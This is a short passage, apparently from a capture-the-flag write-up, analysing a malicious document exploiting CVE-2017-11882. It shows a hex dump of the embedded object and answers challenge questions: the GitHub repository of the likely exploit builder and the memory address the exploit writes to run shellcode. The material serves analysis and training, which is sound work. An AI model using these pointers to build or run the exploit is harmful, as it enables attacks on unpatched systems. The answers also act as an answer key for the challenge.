000000B0: FE FF FF FF 5F 2D 0A 65  00 00 0A 00 00 00 00 00  ...._-.e........
000000C0: 04 00 00 00 2D 01 00 00  09 00 00 00 32 0A 60 01  ....-.......2.`.
000000D0: 10 00 03 00 00 00 31 31  31 00 0A 00 00 00 26 06  ......111.....&.
000000E0: 0F 00 0A 00 FF FF FF FF  01 00 00 00 00 00 1C 00  ................
000000F0: 00 00 FB 02 10 00 07 00  00 00 00 00 BC 02 00 00  ................
00000100: 00 00 01 02 02 22 53 79  73 74 65 6D 00 00 48 00  ....."System..H.
00000110: 8A 01 00 00 0A 00 06 00  00 00 48 00 8A 01 FF FF  ..........H.....
00000120: FF FF 6C E2 18 00 04 00  00 00 2D 01 01 00 04 00  ..l.......-.....
00000130: 00 00 F0 01 00 00 03 00  00 00 00 00              ............


What is the GitHub link of the tool that was likely used to make this exploit?

Answer: https://github.com/rip1s/CVE-2017-11882
Found the GitHub repository via Google dorking: site:github.com intext:CVE-2017-11882


What is the memory address written by the exploit to execute the shellcode?

Answer: 0x00402114
Can be found in the CVE-2017-11882.py source code in the same GitHub repository.



This post is licensed under CC BY 4.0 by the author.